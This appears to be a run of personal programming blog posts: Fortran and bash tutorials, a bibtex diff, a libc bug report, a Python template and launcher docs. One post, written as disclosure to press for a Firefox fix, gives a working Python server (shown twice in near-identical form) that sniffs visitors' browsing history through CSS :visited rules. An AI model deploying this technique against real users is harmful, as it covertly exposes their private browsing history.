  4. Keeping functions simple does not mean that they must be extremely short. If you have a library which provides many tools that get used for things like labelling axes in a plot, and you don’t get much repetition between different functions, then having a function of 20 to 30 lines can be simpler than building an abstraction which only works at the current state of the code but will likely break when you add the next function. This is inherent, function-local complexity: you cannot reduce it with structure. Therefore the sweet spot of simplicity for some tasks is using medium-sized functions. If you find yourself repeating exactly the same code multiple times, however, you likely missed the sweet spot and should investigate shortening the functions by extracting the common tasks, or restructuring the function to separate semantically different tasks. 

  5. In all your structures, do keep program performance in mind. If your structure imposes high performance penalties, you will have to break it more and more as you push it beyond the limits you deemed reasonable at the beginning. And then it adds complexity instead of reducing it. When programming, you always have two audiences. One are humans: your program must be easy to understand and change. If it is not, it will rot. The other is the machine: your program must be sufficiently efficient to execute. If it is not, that will bite you when you push it where it was never meant to go. And you will. If it grows somewhat successful and you get any competition, even if it is much worse, you cannot afford a rewrite. The full rewrite is the number one strategic mistake you should never make. So while you keep one eye on easy structures for humans, keep the other eye on performance for the machine. 

  6. How to find your genius time? That’s a tautology: Your genius time is when you can hold your program in your mind. If I could tell you when your genius time occurs, or even how to trigger it, I could make lots of money by consulting about every tech company in existence. A good starting point is reading about “flow”, known in many other creative activities (some starting points). Reaching the flow often includes spending time outside the flow, so best write programs you can still hack when you feel dumb.8 

  7. This is reasoning from experience. I think the actual reason why people can juggle large familiar structures is more likely that they have an established mental model which allows them to use multiple dimensions and cut the amount of bits you need for referring to the thing.9 See the Absolute Judgments of Multidimensional Stimuli section, the recoding section and the difference between chunks and bits in George A. Miller (1956). This is part of writing programs you can still hack when you feel dumb — but one which only helps those who use the same structures and one which binds you to your established coding style. 

  8. And in all this reduction of local complexity, keep in mind that there is no silver bullet (Brooks, 1986). Just take care that you design your code against the limits of the humans who work with it, and only in the second place against the limits of the tools you use — you can change the tools, but you cannot easily change the humans; often you cannot change the humans at all. In the best case you can make your tools fit and expand the limits of humans. But remember also that your code must run well enough on the machine. And you often do not know what "well enough" means. I know that this is not a simple answer. If that irks you, keep in mind that there is no silver bullet (Brooks, 1986), and this text isn’t one either. It’s just a step on the way — I hope it is useful to you. 

  9. Aside from being able to remember the full mental model, it is often enough to remember something close enough and then find the correct answer with assisted guessing. A typical example is narrowing down auto-completion candidates by matching on likely names until something feels right. This is how good auto-completion — or rather: guided interactive code inspection — massively expands the size of models we can work with efficiently. It depends on easily guessable naming, typically aided by experience, and it benefits from tools which can limit or order the potential candidates by the context. With good tool-support it suffices to have a general feeling about the direction to take for doing something. The guidelines in this article should help you with guessing, and should help your tool with limiting candidates to plausible choices and with ordering them by context. 

Writing a commandline tool in Fortran

Here I want to show you how to write a commandline tool in Fortran. Because Fortran is much better than its reputation — most of all in syntax. I needed a long time to understand that — to get over my prejudices — and I hope I can help you save some of that time.1

This provides a quick-start into Fortran. After finishing it, I suggest having a look at Fortran surprises to avoid stumbling over differences between Fortran and many other languages.

The first program: Hello world :)

Code to be executed when the program runs is enclosed in program and end program:

program hello
  use iso_fortran_env
  write (output_unit,*) "Hello World!"
  write (output_unit,*) 'Hello Single Quote!'
end program hello

Call this fortran-hello.f90 (.f is for the old Fortran 77).

The fastest free compiler is gfortran.

gfortran -std=gnu -O3 fortran-hello.f90 -o fortran-hello
./fortran-hello
Hello World!
Hello Single Quote!

That’s it. This is your first commandline tool.

Reading arguments

Most commandline tools accept arguments. Fortran developers long resisted this and preferred explicit configuration files, but with Fortran 2003, argument parsing entered the standard. The tool for this is get_command_argument.

program cli
  implicit none ! no implicit declaration: all variables must be declared
  character(1000) :: arg

  call get_command_argument(1, arg) ! result is stored in arg, see 
  ! https://gcc.gnu.org/onlinedocs/gfortran/GET_005fCOMMAND_005fARGUMENT.html

  if (len_trim(arg) == 0) then ! no argument given
      write (*,*) "Call me --world!"
  else
      if (trim(arg) == "--world") then
          call get_command_argument(2, arg)
          if (len_trim(arg) == 0) then
              arg = "again!"
          end if
          write (*,*) "Hello ", trim(arg)
          ! trim reduces the fixed-size array to non-blank letters
      end if
  end if
end program
gfortran -std=gnu -O3 fortran-commandline.f90 -o fortran-helloworld
./fortran-helloworld
./fortran-helloworld --world World
./fortran-helloworld --world
Call me --world!
Hello World
Hello again!

Adding structure with modules

The following restructures the program into modules. If you used any OO tool, you know what this does. use X, only : a, b, c gets a, b and c from module x.

Note that you have to declare all variables used in the function at the top of the function.

module hello
  implicit none
  character(100),parameter :: prefix = "Hello" ! parameters are constants
  public :: parse_args, prefix
contains
  function parse_args() result ( res )
    implicit none
    character(1000) :: res

    call get_command_argument(1, res)  
    if (trim(res) == "--world") then
        call get_command_argument(2, res)
        if (len_trim(res) == 0) then
            res = "again!"
        end if
    end if
  end function parse_args
end module hello

program helloworld
  use hello, only : parse_args, prefix
  implicit none
  character(1000) :: world
  world = parse_args()
  write (*,*) trim(prefix), " ", trim(world)
end program helloworld
gfortran -std=gnu -O3 fortran-modules.f90 -o fortran-modules
./fortran-modules --world World
Hello World

You can also declare functions as pure (free from side effects). I did not yet check whether the compiler enforces that already, but if it does not do it now, you can be sure that this will be added. Fortran compilers are pretty good at enforcing what you tell them. Do see the fortran surprises for a few hints on how to tell them what you want.

Performance considerations

Fortran is fast, really fast. But if you come from C, you need to retrain a bit: Fortran arrays are stored column-major, so the first index of a reference should vary in the innermost loop, while in C it is the last index.

The following tests the speed difference when looping over the outer or the inner part. You can get a factor 3-5 difference by having the tight inner loop go over the inner part of the multidimensional array.

Note the L1 cache comments: If you want to get really fast with any language, you cannot ignore the capabilities of your hardware.

Also note that this code works completely naturally on multidimensional arrays.

! Thanks to http://infohost.nmt.edu/tcc/help/lang/fortran/time.html
program cheaplooptest
  integer :: i,j,k,s
  integer, parameter :: n=150 ! 50 breaks 32KB L1 cache, 150 breaks 256KB L2 cache
  integer,dimension(n,n,n) :: x, y
  real etime
  real elapsed(2)
  real total1, total2, total3, total4
  y(:,:,:) = 0
  x(:,:,:) = 1
  total1 = etime(elapsed)
  print *, "start time ", total1
  ! first index as outer loop
  do s=1,n
     do i=1,n
        do j=1,n
           y(i,j,:) = y(i,j,:) + x(i,j,:)
        end do
     end do
  end do
  total2 = etime(elapsed)
  print *, "time for outer loop", total2 - total1
  ! first index as inner loop is much cheaper (difference depends on n)
  do s=1,n
     do k=1,n
        do j=1,n
           y(:,j,k) = y(:,j,k) + x(:,j,k)
        end do
     end do
  end do
  total3 = etime(elapsed)
  print *, "time for inner loop", total3-total2
  ! plain copy is slightly faster still
  do s=1,n
     y = y + x
  end do
  total4 = etime(elapsed)
  print *, "time for simple loop", total4-total3

end program cheaplooptest
gfortran -std=gnu -O3 fortran-faster.f90 -o fortran-faster
./fortran-faster
start time    2.33319998E-02
time for outer loop   19.0533314    
time for inner loop  0.799999237    
time for simple loop  0.729999542    

This now seriously looks like Python, but faster by factor 5 to 20, if you do it right (avoid the outer loop).

Just to make it completely clear: The following is how the final test code looks (without the additional looping which make it slow enough to time it).

program cleanloop
  integer, parameter :: n=150 ! 50 breaks 32KB L1 cache, 150 breaks 256KB L2 cache
  integer,dimension(n,n,n) :: x, y
  y(:,:,:) = 0
  x(:,:,:) = 1
  y = y + x
end program cleanloop

That’s it. If you want to work with any multidimensional stuff like matrices, that’s in most cases exactly what you want. And fast.

A full tool: base60

The previous tools were partial solutions. The following is a complete solution, including numerical work (which is where Fortran really shines). And setting the numerical precision. I’m sharing it in total, so you can see everything I needed to do to get it working well.

This implements newbase60 by tantek.

It could be even nicer, if I could find an elegant way to add complex numbers to the task :)

module base60conv
  implicit none ! if you use this here, the module must come before the program in gfortran
  ! constants: marked as parameter: not function parameters, but
  ! algorithm parameters!
  character(len=61), parameter :: base60chars = "0123456789"&
       //"ABCDEFGHJKLMNPQRSTUVWXYZ_abcdefghijkmnopqrstuvwxyz"
  integer, parameter :: longlong = selected_int_kind(32) ! length up to 32 in base10, int(16)
  integer(longlong), parameter :: sixty = 60
  public :: base60chars, numtosxg, sxgtonum, longlong
  private ! rest is private
contains
  function numtosxg( number ) result ( res )
    implicit none
    !!! preparation
    ! input: ensure that this is purely used as input.
    ! intent is only useful for function arguments.
    integer(longlong), intent(in) :: number
    ! work variables
    integer(longlong) :: n
    integer(longlong) :: remainder
    ! result
    character(len=1000) :: res ! do not initialize variables when
    ! declaring them: That only initializes
    ! at compile time not at every function
    ! call and thus invites nasty errors
    ! which are hard to find.  actual
    ! algorithm
    if (number == 0) then
       res = "0"
       return
    end if
    ! calculate the base60 string

    res = "" ! I have to explicitely set res to "", otherwise it
    ! accumulates the prior results!
    n = number ! the input argument: that should be safe to use.
    ! catch number = 0
    do while(n > 0)
       ! in the first loop, remainder is initialized here.
       remainder = mod(n, sixty)
       n = n/sixty
       ! note that fortran indices start at 1, not at 0.
       res = base60chars(remainder+1:remainder+1)//trim(res)
       ! write(*,*) number, remainder, n
    end do
    ! numtosxg = res
  end function numtosxg

  function sxgtonum( base60string ) result ( number )
    implicit none
    ! Turn a base60 string into the equivalent integer (number)
    character(len=*), intent(in) :: base60string
    integer :: i ! running index
    integer :: idx, badchar ! found index of char in string
    integer(longlong) :: number
    ! integer,dimension(len_trim(base60string)) :: numbers ! for later openmp
    badchar = verify(base60string, base60chars)
    if (badchar /= 0) then ! one not
       write(*,"(a,i0,a,a)") "# bad char at position ", badchar, ": ", base60string(badchar:badchar)
       stop 1 ! with OS-dependent error code 1
    end if

    number = 0
    do i=1, len_trim(base60string)
       number = number * 60
       idx = index(base60chars, base60string(i:i), .FALSE.) ! not backwards
       number = number + (idx-1)
    end do
    ! sxgtonum = number
  end function sxgtonum

end module base60conv

program base60
  ! first step: Base60 encode. 
  ! reference: http://faruk.akgul.org/blog/tantek-celiks-newbase60-in-python-and-java/
  ! 5000 should be 1PL
  use base60conv
  implicit none

  integer(longlong) :: tests(14) = (/ 5000, 0, 100000, 1, 2, 60, &
       61, 59, 5, 100000000, 256, 65536, 215000, 16777216 /)
  integer :: i, badchar ! index for the for loop
  integer(longlong) :: n ! the current test to run
  integer(longlong) :: number
  ! program arguments
  character(1000) :: arg
  call get_command_argument(1, arg) ! modern fortran 2003!
  if (len_trim(arg) == 0) then ! run tests
     ! I have to declare the return type of the function in the main program, too.
     ! character(len=1000) :: numtosxg
     ! integer :: sxgtonum
     ! test the functions.
     do i=1,size(tests) 
        n = tests(i)
        write(*,"(i12,a,a,i12)") n, " ", trim(numtosxg(n)), sxgtonum(trim(numtosxg(n)))
     end do
  else
     if (trim(arg) == "-r") then
        call get_command_argument(2, arg)
        badchar = verify(arg, " 0123456789")
        if (badchar /= 0) then
           write(*,"(a,i0,a,a)") "# bad char at position ", badchar, ": ", arg(badchar:badchar)
           stop 1 ! with OS-dependent error code 1
        end if
        read (arg, *) number ! read from arg, write to number
        write (*,*) trim(numtosxg(number))
     else
        write (*,*) sxgtonum(arg)
     end if
  end if
end program base60
gfortran -std=gnu -O3 fortran-base60.f90 -o fortran-base60
./fortran-base60 P
./fortran-base60 h
./fortran-base60 D
./fortran-base60 PhD
factor $(./fortran-base60 PhD) # yes, it’s prime! :)
./fortran-base60 -r 85333
./fortran-base60 "!" || echo $?
echo "^ with error code on invalid input :)"
 23
 42
 13
 85333
85333: 85333
 PhD
# bad char at position 1: !
1
^ with error code on invalid input :)

Conclusion

Fortran done right looks pretty clean. It does have its warts, but not more than all the other languages which are stable enough that the program you write today will still run in 10 years to come. And it is fast. And free.

Why I’m writing this? To save you a few years of lost time I spent adjusting my mistaken distaste for a pretty nice language which got a bad reputation because it once was the language everyone had to learn to get anything done (with sufficient performance). And its code did once look pretty bad, but that’s long become ancient history — except for the tools which were so unbelievably good that they are still in use 40 years later.

You can ask "what makes a programming language cool?". One easily overlooked point is: Making your programs still run three decades later. That doesn’t look fancy and it doesn’t look modern, but it brings a lot of value.

And if you use it where it is strong, Fortran is almost as easy to write as Python, but a lot faster (in terms of CPU requirement for the whole task) with much lower resource consumption (in terms of memory usage and startup time). Should you now ask "what about multiprocessing?", then have a look at OpenMP.


  1. After I finished my Diploma, I thought of Fortran as "this horribly unreadable 70s language". I thought it should be removed and that it only lived on due to pure inertia. I thought that its only deeper use was to provide the libraries to make numeric Python faster. Then I actually had to use it. In the beginning I mocked it and didn’t understand why anyone would choose Fortran over C. What I saw was mostly Fortran 77. The first thing I wrote was "Fortran surprises" — all the strange things you can stumble over. But bit by bit I realized the similarities with Python. That well-written Fortran actually did not look that different from Python — and much cleaner than C. That it gets stuff done. This year Fortran turns 60 (heise reported in German). And I understand why it is still used. And thanks to being an ISO standard it is likely that it will stick with us and keep working for many more decades. 

Attachment  Size
2017-04-10-Mo-fortran-commandline-tool.pdf  172.84 KB
2017-04-10-Mo-fortran-commandline-tool.org  14.01 KB

Your browser history can be sniffed with just 64 lines of Python (tested with Firefox 3.5.3)

Update: The basic bug shown here is now fixed in Firefox. Read on to see whether the fix works for you. Keep in mind that there are much stronger attacks than the one shown here. Use private mode to reduce the amount of data your Browser keeps. What’s not there cannot be claimed.

After the example of making-the-web, I was quite intrigued by the ease of sniffing the history via simple CSS tricks.

- Firefox Bug report - finally resolved fixed.
- Start Panic! - a site dedicated to spreading the news about the vulnerability.

So I decided to test, how small I get a Python program which can sniff the history via CSS - without requiring any scripting ability on the browser-side.

I first produced fully commented code (see server.py) and then stripped it down to just 64 lines (server-stripped.py), to make it really crystal clear that making your browser vulnerable to this exploit is a damn bad idea. I hope this will help get Firefox fixed quickly.

If you see http://blubber.blau as found, you're safe. If you don't see any links as found, you're likely to be safe. In any other case, everyone in the web can grab your history - if given enough time (a few minutes) or enough iframes (which check your history in parallel). This doesn't use Javascript.

It currently only checks for the 1000 or so most visited websites and doesn't keep any logs in files (all info is in memory and wiped on every restart), since I don't really want to create a full fledged history ripper but rather show how easy it would be to create one.

Besides: It does not need to be run in an iframe. Any Python-powered site could just run this test as regular part of the site while you browse it (and wonder why your browser has so much to do for a simple site, but since we’re already used to high load due to Javascript, who is going to care?). So don’t feel safe, just because there are no iframes. To feel and be safe, use one of the solutions from What the Internet knows about you.
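
For illustration, here is a minimal sketch of the mechanism in Python 3 (this is not the server.py mentioned above, just the bare idea, and current browsers no longer send these requests):

from http.server import BaseHTTPRequestHandler, HTTPServer

SITES = ["http://blubber.blau", "http://www.example.org"]  # candidate URLs to probe

def build_page():
    # one :visited rule per candidate link: the background image is only
    # requested if the browser considers the link visited
    css = "".join(
        "#l%d:visited { background: url(/visited?site=%d); }\n" % (i, i)
        for i in range(len(SITES)))
    links = "".join('<a id="l%d" href="%s">%s</a><br>\n' % (i, s, s)
                    for i, s in enumerate(SITES))
    return ("<html><head><style>%s</style></head><body>%s</body></html>"
            % (css, links)).encode("utf-8")

class Sniffer(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith("/visited?site="):
            i = int(self.path.split("=", 1)[1])
            print("visited:", SITES[i])  # the request itself leaks the history entry
            self.send_response(204)
            self.end_headers()
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.end_headers()
            self.wfile.write(build_page())

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8000), Sniffer).serve_forever()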

Konqueror seems to be immune: It also (pre-)loads the "visited" images for links which were not visited, so every page is seen as visited - which is the only way to avoid spreading my history around on the web while still providing “visited” image-hints in the browser!

Firefox 4.0.1 seems to be immune, too: It does not show any :visited-images, so the server does not get any requests.

So please don't let your browser load anything depending on the :visited state of a link tag! It shouldn't load anything based on internal information, because that always publicizes private information - and you don't know who will read it!

In short: Don't keep repeating Ennesby's mistake:

  • Mistake: http://www.schlockmercenary.com/d/20071201.html

  • Effects: http://www.schlockmercenary.com/d/20071206.html

(comic strips not hosted here and not free licensed → copyright: Howard V. Tayler)

And to the Firefox developers: Please remove the optimization of only loading required CSS data based on the visited info! I already said so in a bug report, and since the bug isn't fixed, this is my way to put a bit of weight behind it. Please stop putting your users' privacy at risk.

Usage:

  • python server.py
    start the server at port 8000. You can now point your browser to http://127.0.0.1:8000 to get sniffed :)

To get more info, just use ./server.py --help.
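
For illustration, here is a minimal sketch of the underlying CSS trick (not the actual server.py; the site list and all names are made up for this example): the served stylesheet requests a per-link background image only for :visited links, so every image request the browser sends back reveals one entry of the history.

#!/usr/bin/env python3
"""Minimal sketch of CSS :visited history sniffing (illustration only)."""
from http.server import BaseHTTPRequestHandler, HTTPServer

# hypothetical list of sites to test; the real script checks about 1000
SITES = ["http://www.example.com/", "http://blubber.blau/"]

def page():
    """Build a page whose stylesheet requests an image only for visited links."""
    css = "\n".join(
        'a#l{i}:visited {{ background-image: url("/visited?i={i}"); }}'.format(i=i)
        for i in range(len(SITES)))
    links = "\n".join(
        '<a id="l{i}" href="{s}">{s}</a><br/>'.format(i=i, s=s)
        for i, s in enumerate(SITES))
    return "<html><head><style>" + css + "</style></head><body>" + links + "</body></html>"

class Sniffer(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith("/visited?i="):
            # the mere arrival of this request tells us the link was visited
            print("in history:", SITES[int(self.path.split("=", 1)[1])])
            self.send_response(204)
            self.end_headers()
        else:
            body = page().encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.end_headers()
            self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8000), Sniffer).serve_forever()

With the fix described in the update above, current browsers no longer load :visited background images, so this sketch only demonstrates the historical bug.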

adapt plainnat bibtex natbib style to only show the url if no doi is available

Since the URL in a bibtex entry is typically just duplicate information when the entry has a DOI, I want to hide it.1

Here’s how:

diff -r 5b78f551d0a0 plainnatnoturl.bst
--- a/plainnatnoturl.bst    Tue Apr 04 10:45:08 2017 +0200
+++ b/plainnatnoturl.bst    Tue Apr 04 10:52:25 2017 +0200
@@ -1,5 +1,7 @@
-%% File: `plainnat.bst'
-%% A modification of `plain.bst' for use with natbib package 
+%% File: `plainnatnoturl.bst'
+%% A modification of `plain.bst' and `plainnat.bst' for use with natbib package 
+%% 
+%% From /usr/share/texmf-dist/bibtex/bst/natbib/plainnat.bst
 %%
 %% Copyright 1993-2007 Patrick W Daly
 %% Max-Planck-Institut f\"ur Sonnensystemforschung
@@ -285,7 +288,11 @@
 FUNCTION {format.url}
 { url empty$
     { "" }
-    { new.block "URL \url{" url * "}" * }
+    { doi empty$
+      { new.block "URL \url{" url * "}" * }
+      { "" }
+      if$
+    }
   if$
 }

Just put this next to your .tex file, add a header linking the doi

\newcommand*{\doi}[1]{\href{http://dx.doi.org/#1}{doi: #1}}

and use the bibliography referencing plainnatnoturl.bst

\bibliographystyle{plainnatnoturl}
\bibliography{YOURBIBFILE}

That’s it. Thanks to toliveira from tex.stackexchange!

Footnotes:

1

Also I’m scraping at my page limit and cutting a line for roughly every second entry helps a lot :)

complex number compiler and libc bugs (cexp+conj) on OSX and with the intel compiler (icc)

Today a bug in complex number handling surfaced in guile which only appeared on OSX.

This is a short note just to make sure that the bug is reported somewhere.

Test-code (written mostly by Mark Weaver who also analyzed the bug - I only ran the code on a few platforms I happened to have access to):

// test.c
// compile with gcc -O0 -o test test.c -lm
// or with icc -O0 -o test test.c -lm
#include <complex.h>
#include <stdio.h>

int
main (int argc, char **argv)
{
  double complex z = conj (1.0);
  double complex result;

  if (argc == 1)
    z = conj (0.0);

  result = cexp (z);

  printf ("cexp (%f + %f i) => %f + %f i\n",
          creal (z), cimag (z), creal (result), cimag (result));
  result = conj(result);
  printf ("conj(cexp (%f + %f i)) => %f + %f i\n",
          creal (z), cimag (z), creal (result), cimag (result));

  return 0;
}

As per the C11 standard (pages 561 and 216) this should return:

cexp (0.000000 + -0.000000 i) => 1.000000 + -0.000000 i

conj(cexp (0.000000 + -0.000000 i)) => 1.000000 + 0.000000 i

Page 561:

— cexp(conj(z)) = conj(cexp(z)).

Page 216:

The conj functions compute the complex conjugate of z, by reversing the sign of its imaginary part.

On OSX it returns (compiled with GCC):

TODO: Check the second line!

cexp (0.000000 + -0.000000 i) => 1.000000 + 0.000000 i

With the intel compiler it returns:

cexp (0.000000 + 0.000000 i) => 1.000000 + 0.000000 i

conj(cexp (0.000000 + 0.000000 i)) => 1.000000 + 0.000000 i

In short: On OSX cexp seems broken. With the intel compiler conj seems broken.

icc --version
# => icc (ICC) 13.1.3 20130607
# => Copyright (C) 1985-2013 Intel Corporation.  All rights reserved.

The OSX compiler is GCC 4.8.2 from MacPorts.


[taylanub] ArneBab: You might want to add that compiler optimizations can result in cexp() calls where there are none (which is how this bug surfaced in our case).

[mark_weaver] cexp(z) = e^z = e^(a+bi) = e^a * e^(bi) = e^a * (cos(b) + i*sin(b))

[mark_weaver] for real 'b', e^(bi) is a point on the unit circle on the complex plane.

[mark_weaver] so cexp(bi) can be used to compute cos(b) and sin(b) simultaneously, and probably faster than calling 'sin' and 'cos' separately.
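
As a quick illustration of that identity (a Python sketch just to check the math, unrelated to the C bug above):

import cmath, math

b = 0.7
z = cmath.exp(1j * b)   # e^(i*b): a point on the unit circle
print(abs(z))           # 1.0 (up to rounding)
print(z.real - math.cos(b), z.imag - math.sin(b))  # both ~ 0.0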

minimal Python script

Over the years I found a few things which in my opinion are essential for any Python script:

  • A description,
  • useful logging,
  • argument parsing and
  • doctests.

Everything in this setup is low-overhead and available from Python 2.6 to 3.x, so you can use it to start any kind of project.

# encoding: utf-8

"""Minimal setup for a Python script.

No project should start without this.
"""

import argparse # for Python <2.6 use optparse
# setup sane logging. It tells you why, where and when something was
# logged, so you can jump to the source line right away.
import logging
logging.basicConfig(level=logging.WARNING,
                    format=' [%(levelname)-7s] (%(asctime)s) %(filename)s::%(lineno)d %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')


def main():
    """The main entry point."""
    pass


# output test results as base60 number (for aesthetics)
def numtosxg(n):
    CHARACTERS = ('0123456789'
                  'ABCDEFGHJKLMNPQRSTUVWXYZ'
                  '_'
                  'abcdefghijkmnopqrstuvwxyz')
    s = ''
    if not isinstance(n, int) or n == 0:
        return '0'
    while n > 0:
        n, i = divmod(n, 60)
        s = CHARACTERS[i] + s
    return s


def _test():
    """  run doctests, can include setup. Complex example:
    >>> import sys
    >>> handlers = logging.getLogger().handlers # to stdout
    >>> logging.getLogger().handlers = []
    >>> logging.getLogger().addHandler(
    ...     logging.StreamHandler(stream=sys.stdout))
    >>> logging.warn("test logging")
    test logging
    >>> logging.getLogger().handlers = handlers
    """
    from doctest import testmod
    tests = testmod()
    if not tests.failed:
        return "^_^ ({})".format(numtosxg(tests.attempted))
    else: return ":( "*tests.failed

# keep argument setup and parsing together

parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
parser.add_argument("arguments", metavar="args", nargs="*",
                    help="Commmandline arguments")
parser.add_argument("--debug", action="store_true",
                    help="Set log level to debug")
parser.add_argument("--info", action="store_true",
                    help="Set log level to info")
parser.add_argument("--quiet", action="store_true",
                    help="Set log level to error")
parser.add_argument("--test", action="store_true",
                    help="Run tests")


# add a commandline switch to increase the log-level when running this
# script standalone. --test should run the tests.
if __name__ == "__main__":
    args = parser.parse_args()
    if args.debug:
        logging.getLogger().setLevel(logging.DEBUG)
    elif args.info:
        logging.getLogger().setLevel(logging.INFO)
    elif args.quiet:
        logging.getLogger().setLevel(logging.ERROR)
    if args.test:
        print(_test())
    else:
        main()
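
Saved as script.py (a name picked just for this example), this skeleton can be driven from the shell right away; --test runs the doctests in _test and should print something like ^_^ (6), the number of doctest examples run, shown in base 60:

python script.py --test
python script.py --debug some arguments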

pyRad - a wheel type command interface for KDE

Arrrrrr! Ye be replacin' th' walk th' plank alt-tab wi' th' keelhaulin' pirate wheel, matey! — Lacrocivious

pyRad is a wheel type command interface for KDE1, designed to appear below your mouse pointer at a gesture.

install | setup | usage and screenshots | download and sources

pyRad command wheel

Install

in any distro

  • Get Python.
  • call easy_install pyRadKDE in any shell.
  • Test it by calling pyrad.py.
  • This should automatically pull in pyKDE4. If it doesn’t, you need to install that separately.
  • Visual icon selection requires the kdialog program (a standard part of KDE).

  • For a "live" version, just clone the pyrad Mercurial repo and let KDE run "path/to/repo/pyrad.py" at startup. You can stop a running pyrad via pyrad.py --quit. pyrad.py --help gives usage instructions.

In Gentoo

  • emerge -a kde-misc/pyrad

In unfree systems (like MacOSX and Windows)

  • I have no clue since I don’t use them. You’ll need to find out yourself or install a free system. Examples are Kubuntu for beginners and Gentoo for convenient tinkering. Both run GNU/Linux.

Setup

  • Run /usr/bin/pyrad.py. Then add it as script to your autostart (systemsettings→advanced→autostart). You can now use Alt-F6 and Meta-F6 to call it.

Mouse gesture (optional)

  • Add the mouse gesture in systemsettings (systemsettings→shortcuts) to call D-Bus: Program: org.kde.pyRad ; Object: /MainApplication ; Function: newInstance (you might have to enable gestures in the settings, too - in the shortcuts-window you should find a settings button).

  • Alternately set the gesture to call the command dbus-send --type=method_call --dest=org.kde.pyRad /MainApplication org.kde.KUniqueApplication.newInstance.

Customize the wheel

Customize the menu by editing the file "$HOME/.pyradrc" or middle-clicking (add) and right-clicking (edit) items.

Usage and screenshots

To call pyRad and see the command wheel, you simply use the gesture or key you assigned.

pyRad command wheel

Then you can activate an action with a single left click. Actions can be grouped into folders. To open a folder, you also simply left-click it.

Also you can click the keyboard key shown at the beginning of the tooltip to activate an action (hover the mouse over an icon to see the tooltip).

To make the wheel disappear or leave a folder, click the center or hit the key 0. To just make it disappear, hit escape.

For editing an action, just right click it, and you’ll see the edit dialog.

pyRad edit dialog

Each item has an icon (either an icon name from KDE or the path to an icon) and an action. The action is simply the command you would call in the shell (only simple commands, though, no real shell scripting or glob).

To add a new action, simply middle-click the action before it. The wheel goes clockwise, with the first item being at the bottom. To add a new first item, middle-click the center.

To add a new folder (or turn an item into a folder), simply click on the folder button, say OK and then click it to add actions in there.

See it in action:

pyRad in action (screenshot)

download and sources

pyRad is available from PyPI (easy_install pyRadKDE), from the Mercurial repository linked above and from Gentoo portage (kde-misc/pyrad).

PS: The name is a play on ‘python’, ‘Rad’ (German for wheel) and pirate :-)

PPS: KDE, K Desktop Environment and the KDE Logo are trademarks of KDE e.V.

PPPS: License is GPL+ as with almost everything on this site.


  1. powered by KDE 

Attachments:
pyrad-0.4.3-screenshot.png (26.67 KB)
pyrad-0.4.3-screenshot-edit-action.png (36.28 KB)
pyrad-0.4.3-screenshot-edit-folder.png (39.18 KB)
pyrad-0.4.3-screenshot2.png (29.03 KB)
pyrad-0.4.3-screenshot3.png (27.59 KB)
powered_by_kde_horizontal_190.png (11.96 KB)
pyrad-0.4.3-fullscreen.png (913.3 KB)
pyrad-0.4.3-fullscreen-400x320.png (143.69 KB)
pyrad-0.4.4-screenshot-edit-action.png (40.94 KB)

pyRad is now in Gentoo portage! *happy*

My wheel type command interface pyRad just got included in the official Gentoo portage-tree!

So now you can install it in Gentoo with a simple emerge kde-misc/pyrad.

pyRad command wheel

Many thanks go to the maintainer Andreas K. Hüttel (dilfridge), to jokey and Tommy[D] from the Gentoo sunrise project (wiki) for providing their user-overlay and helping users create ebuilds, and to Arfrever, neurogeek and floppym from the Gentoo Python herd for helping me clean up the ebuild and convert it to EAPI 3!

shell basics (bash)

These are the notes to a short tutorial I gave to my working group as part of our groundwork group meetings. Some parts here require GNU Bash.

1 Outline

1.1 Outline

  • user-output: echo
  • pipes: |, xargs, - (often stdin)
  • text-processing: cat/tac, sed, grep, cut, head/tail
  • variables (foo=1; echo ${foo})
  • subshell: $(command)
  • loops (for; do; done) (while; do; done)
  • conditionals (if; then; fi)
  • scripts: shebang
  • return values: $?
  • script-arguments: $1, $#, $@ and getopt
  • command chaining: ;, &, && and ||
  • functions and function-arguments
  • math: $((1+2))
  • help: man and info

2 Notes

2.1 user-output

echo "foobar"
echo foobar
echo echo # second echo not executed but printed!

2.2 Pipes

  • basic way of passing info between programs
echo foobar | xargs echo
# same output as
echo foobar
echo foo > test.txt # pipe into file, replacing the content
echo bar >> test.txt # append to file
# warning: 
cat test.txt > test.txt # defined as generating an empty file!

2.3 text-processing

echo foobar | sed s/foo.*/foo/ | xargs echo
# same output as 
echo foo
echo foo | grep bar # empty
echo foobar | grep oba # foobar, oba highlighted

2.4 Variables

foo=1 # no spaces around the equal sign!
echo ${foo} # "$foo" == "1", "$foobar" == "", "${foo}bar" == "1bar"

2.5 Subshells

echo $(echo foobar)
# equivalent to
echo foobar | xargs echo

2.6 loops

for i in a b c; do 
    echo $i
done
# ; can replace a linebreak
for i in a b c; do echo $i; done
for i in {1..5}; do # 1 2 3 4 5
    echo $i
done
while true; do 
    break; 
done
# break: stop
# continue: start the loop again

2.7 Quoting

foo=1
echo "${foo}" # 1
echo '${foo}' # ${foo} <- literal string
for i in "a b c"; do # quoted: one argument
    echo ${i}; 
done 
# => a b c
for i in a b c; do # unquoted: whitespace is separator!
    echo ${i}; 
done 
# a
# b
# c

2.8 conditionals

# string equality
a="foo"
b="bar"
if [[ x"${a}" == x"${b}" ]] ; then
    echo a
else
    echo b
fi
# other tests
if test -z ""; then 
    echo empty
fi
if [ -z "" ]; then
    echo same check
fi
if [ ! -z "not empty" ]; then
    echo inverse check
fi
if test ! -z "not empty"; then
    echo inverse check with test
fi
if test 5 -ge 2; then
    echo 5 is greater or equal 2
fi

also check test 1 -eq 1, and info test.

2.9 scripts: shebang/hashbang

#!/usr/bin/env bash
echo "Hello World"
chmod +x hello.sh
./hello.sh

2.10 Scripts: return value

echo 1
echo $? # 0: success
grep 1 /dev/null # fails
echo $? # 1: failure
exit 0 # exit a script with success value (no further processing of the script)
exit 1 # exit with failure (anything but 0 is a failure)

2.11 define shell arguments with getopt

# info about this script
version="shell option parsing example 0.1"
# check for the kind of getopt
getopt -T > /dev/null
if [ $? -eq 4 ]; then
    # GNU enhanced getopt is available
    eval set -- `getopt --name $(basename $0) --long help,verbose,version,output: --options hvo: -- "$@"`
else
    # Original getopt is available
    eval set -- `getopt hvo: "$@"`
fi

